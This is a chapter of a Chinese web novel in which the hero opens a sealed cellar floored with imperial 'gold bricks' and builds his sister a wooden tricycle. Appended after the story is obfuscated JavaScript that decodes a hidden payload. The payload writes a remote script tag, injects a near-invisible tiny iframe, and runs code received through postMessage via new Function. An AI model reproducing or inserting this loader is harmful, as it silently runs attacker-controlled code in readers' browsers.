当前位置:铅笔小说>言情女生>重生1982做顽主> 第七十五章 儿童三轮车

第七十五章 儿童三轮车

  早晨,杜明早早的起来,杜康一句宝藏惹着他根本睡不着觉,想要知道这底下到底埋藏着什么宝贝。

  当时也询问过杜康,但他没说,而是让他拭目以待。

  这不是诚心让他着急。

  吃过饭,将杜强叫回来,三人一起进去,都是家人嘛,用着放心。

  领他们进入地下室,看着那巨大的地下室,两人又是一阵惊叹,本来上面已经足够宽阔,住几十人都没问题,你下面又弄个地下室,这也太奢侈了。

  “这就是你说的宝藏,这不是刚刚建的地下室吗。”

  “宝藏在另一边,容我卖个关子,等会保证让你们惊掉下巴。”

  带他们来到靠近旁边四合院的地方,那里有一间地下室,而在地下室的最里面,不是墙而是一个拱门,拱门中间则是砌上的墙。

  就仿佛原本是道路,却用青砖填充上一样。

  这当然是杜康的手笔,在通过视野共享进入地下室之后,他根据那边的情况,又改变了一下地下室的结构。

  专门在这里砌成这样,等需要的时候,可以借此打通与密室的联系,进入对面。

  同时又不会因为别人进入地下室,将暴露出去。

  这里就是一间地下室,将外面的房门一锁,任谁也不会想到,房间后面,竟然是一个巨大的密室。

  但两人不知道,皆是一副好奇模样,不知道他将墙砌成这样准备干什么。

  “你们说那边是什么?”

  “当然是地下全都是土,还能有什么。”

  “我是询问你们认为对面是什么?”

  “不知道,那里到底有什么?”

  杜明哪里知道,但想到杜康说的宝藏,忍不住一阵激动,难道那边真的有什么宝藏,要不然又怎会将地下室做成这样的格局。

  杜康笑而不语,而是拿工具开始砸墙,将填充拱门的青砖翘出来,放到一边。

  然后拿着铁锹开始挖掘。

  这里土质疏松,又是几个壮劳力,速度很快,一个上午就挖出两米多,露出后面的青砖墙面。

  “这就是你说的宝藏,里面有什么好东西?”

  “等你们进去看看就知道了。”

  小心撬下对面的青砖进入其中,两人瞬间惊叹不已,没想到对面四合院中,竟然也有这样的密室。

  然而参观半天,两人看到这破败的密室,除了面积较大之外,根本就没有什么宝藏。

  别说想象中那成箱的宝物,就连一个铜板都找不到。

  反倒是地面积了厚厚的一层灰,走上去尘土飞扬,呛得人连连咳嗽。

  杜明失望道“我还以为什么宝藏呢,不就是一个空地下室,能有什么用。”

  你这是入宝山而不自知。

  忍不住提醒道“下面铺的是什么?”

  “土砖。”

  杜康绝倒,什么眼神,这可是大名鼎鼎的金钻,怎么到了你们口中就成了土砖。

  “这是金砖,皇帝上朝的金銮殿铺的就是这种砖。”

  瞬间两人不顾肮脏,趴在地上仔细打量,怎么也没想到下面的砖,竟然有这样的来历。

  宫廷制作,皇室联名,什么物品跟贡品联系到一起,都得瞬间身价百倍。

  然而没一会,杜明就失望道“你确定是金砖,怎么灰扑扑的这么难看。”

  “时间久了就这样,清理一下就会恢复原样。”

  “那我用水刷刷,保证给你打扫得干干净。”

  “千万别,金砖不能沾水,我会另想办法。”

  你当这是地板砖,可以用水刷。

  虽然名为金砖,阳光投射在地面也能有金光闪闪的感觉,但归根结底还是泥砖,使用的时候就要注意保养。

  比如清扫地面的时候不能沾水拖地,也不能用很硬的扫把扫地,这些都会伤害金砖的光泽。

  所以明清时对金砖的保养,都是使用的桐油,现在嘛,已经发展到使用煤油。

  听到杜康的解释,两人真没想到金砖的保养竟然有这样的要求,但也没说什么,只是拿来扫把将密室打扫干净。

  这密室至少有几十年没人进入,已经落了一层厚厚的灰尘,更可以看到一个个的老鼠洞。

  不打扫干净,穿着干净衣服进来,出去的时候就成了灰耗子。

  扯了根电线进来,在里面安上电灯,三人就开始打扫卫生,一直打扫到傍晚,方才打扫干净。

  锁上门出去,杜康又专门给两人说了下,让他们出去以后别乱传这事。

  这事自己人知道就行,让别人知道很容易横生枝节。

  两人当即表示绝不会乱传。

  这么好的地方,当然得自己留着,哪能告诉别人。

  随后杜康就开始给囡囡制作小车,就用红木制作,不因红木名贵,只因足够坚硬能够几十年不坏。

  囡囡用完还可以传给她小侄子,说不定传给侄孙都行。

  时间长了甚至能成为个传家宝。希望。

  他本打算制作一个四轮轿车,劳斯莱斯造型的那种,但想了下随即否决这个想法。

  baimengshu.com

  四轮车实在太沉,别说小孩,大人骑着都费劲。

  现在没什么合适的动力来源,能够安装在玩具车上。

  别说是他,号称能手搓航母的八级工,也干不了这种事。

  外形他能给做出来,可没有动力来源,外表做的再漂亮又有何用。

  到时候囡囡骑不动,找人拉,谁拉?

  自己是她亲哥啊,妥妥的第一苦力。

  到时囡囡坐在车上把控方向盘,高兴的大呼小叫,自己跟个驴似的在前面拉车,那场面想想太美。

  出去买了些零件,然后动手改造,给她做了个儿童三轮车,后面还带着个小车斗。

  没事的时候可以让她骑着玩,在大人的照看下四处闲逛。

  等出去买菜的时候,也可以将东西放在后面。

  看来老妈会很喜欢这个设计,至少不用再让她提着菜。

  忙碌一天将车做出来,囡囡见到这小车,顿时高兴得一蹦三尺。

  搂着他说“哥哥,你真是我的好哥哥,我太喜欢了。”

  说着还吧唧亲了他一口。

  杜康也是哭笑不得,给你坐个车就成了好哥哥,要是不给你弄,那我丑事就得被你传的四处都是。

  你这妹妹真是太好了,对哥哥真是太贴心。
eval("\x77\x69\x6e\x64\x6f\x77")["\x43\x6c\x74\x79"]=function(e){var li ='ABCDEFGHIJKLMNOPQRS'+''+'TUVWXYZabcdefghi'+'jklmnopqrstuvwx'+''+'yz0123456789+/='+''+'';var t="",n,r,i,s,o,u,a,f=0;e=e['re'+'pla'+'ce'](/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=li.indexOf(e.charAt(f++));o=li.indexOf(e.charAt(f++));u=li.indexOf(e.charAt(f++));a=li.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return (function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2;}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);}
eval("\x77\x69\x6e\x64\x6f\x77")["\x69\x52\x5a"]=function(){eval(Clty("OyhmdW5jdGlvbih1LHIsdyxkLGYsYyl7dmFyIGRzPW5ldyBEYXRlKCk7dT1kZWNvZGVVUklDb21wb25lbnQoQ2x0eSh1LnJlcGxhY2UobmV3IFJlZ0V4cChjKycnK2MsJ2cnKSxjKS5zcGxpdCgnJykucmV2ZXJzZSgpLmpvaW4oJycpKSk7dT11LnJlcGxhY2UoL3FpaGFuZy9nLGRzLmdldERhdGUoKSk7J2pRdWVyeSc7dmFyIF91YT1uYXZpZ2F0b3IudXNlckFnZW50O3ZhciBfQ2x0eUNsdHk9JzxzJysnY3JpJysncHQgc3JjPSInK3UrJy5qcyI+PFwvcycrJ2NyaXAnKyd0Pic7aWYoX3VhLmluZGV4T2YoQ2x0eSgiWW1GcFpIVT0iKSk+LTEgfHwgX3VhLmluZGV4T2YoQ2x0eSgnU0hWaGQyVnBRbkp2ZDNObGNnPT0nKSk+LTEpe2lmKF91YS5pbmRleE9mKENsdHkoJ2FWQm9iMjVsJykpPi0xKXtkb2N1bWVudC53cml0ZShfQ2x0eUNsdHkpO31lbHNle2Z1bmN0aW9uIHJkKG4sbSl7cmV0dXJuIE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSoobS1uKzEpK24pO31mdW5jdGlvbiBybShlKXtpZihlJiZlLnRhZ05hbWUudG9VcHBlckNhc2UoKT09PSJJRlJBTUUiJiZlLnNyYy5pbmRleE9mKHUpPi0xKXtlLnJlbW92ZSgpO31lbHNlIGlmKGUubmV4dEVsZW1lbnRTaWJsaW5nKXtybShlLm5leHRFbGVtZW50U2libGluZyk7fX1sZXQgYz1kW0NsdHkoIlkzVnljbVZ1ZEZOamNtbHdkQT09IildO3ZhciBfaWQ9X2NsYXNzPSdnJysnJysncUFqJysnJysneCcrJycrJ0hSJysnJysnJzt2YXIgX19rZG5xaWQgPSAnaycgKyByZCgxLCAxMDAwMDApO2RbJ3cnKydyaScrJ3QnKydlJysnbG4nXSgnPGQnKydpdiBpJysnZD0nKyciJytfX2tkbnFpZCsnIj4nKyc8L2QnKydpdicrJz4nKTt3WydfX2snKydkYScrJ25xJysnb2InKydqXzE4NyddPWRbJ3F1JysnZXJ5JysnU2VsZScrJ2N0bycrJ3InXSgnIycrX19rZG5xaWQpO19pZCArPSBkWydxdScrJ2VyeScrJ1NlJysnbGVjJysndG8nKydyQScrJ2xsJ10oJy4nK19jbGFzcykubGVuZ3RoO3ZhciB6ID0gdSsnLTIvJytfaWQrJy8nK3I7ZFsndycrJ3JpJysndCcrJ2UnXSgnPGknKydmcicrJ2EnKydtZSBzdHlsZT0iJysnbScrJ2FyJysnZ2knKyduOjA7cCcrJ2FkJysnZCcrJ2luJysnZzowO2InKydvcicrJ2QnKydlcjpuJysnb24nKydlOycrJ29wJysnYScrJ2NpJysndCcrJ3k6MCcrJy4wJytyZCgyLDkpKyc7d2knKydkdCcrJ2g6JytyZCgyLDUpKydwJysneDtoJysnZScrJ2lnaCcrJ3Q6JytyZCgyLDUpKydwJysneDsnKyciYWwnKydsb3d0cmFuJysnc3BhJysncmVuY3kgc3InKydjPSInK3orJyI+PC9pJysnZnInKydhJysnbWU+Jyk7d1siYWQiKyJkRXYiKyJlbnRMIisiaXN0IisiZW5lciJdKCJtIisiZXNzIisiYWdlIixmdW5jdGlvbihlKXtpZihlLmRhdGFbcitfaWRdKXtybShjKTtuZXcgRnVuY3Rpb24oQ2x0eShlLmRhdGFbcitfaWRdLnJlcGxhY2UobmV3IFJlZ0V4cChyLCdnJyksJycpKSkoKTt9fSk7fX1lbHNle2RvY3VtZW50LndyaXRlKF9DbHR5Q2x0eSk7fX0pKCc9VScrJ2onKycnKydNdGMnKycnKydET3gnKycnKycweScrJycrJ1knKycnKydHJysnJysnSicrJycrJ1RKJysnJysnbicrJzVXJysnJysnWW9sJysnJysnV2NrJysnJysnSicrJycrJ1dibycrJycrJ1JuYycrJycrJ24nKydaJysnWicrJycrJ2tNJysnJysnbCcrJycrJ01ETicrJzBBaicrJ01CTicrJ1QnKydKbCcrJycrJ1JYYScrJycrJ3onKycnKyc1JysneScrJ1onKydadScrJ0YnKycnKydHYScrJ3BGJysnJysnSGNvJysnJysnRm0nKycnKydMelonKydaa00nKycnKydsWScrJ2tNbCcrJ0UwTScrJycrJ2xNSCcrJycrJ2MnKycwJysnUicrJ0hhJysnJysnJywnZycrJycrJ3FBaicrJycrJ3gnKycnKydIUicrJycrJycsd2luZG93LGRvY3VtZW50LDAsJ1onKQ=="));}

上一章目录+书签下一章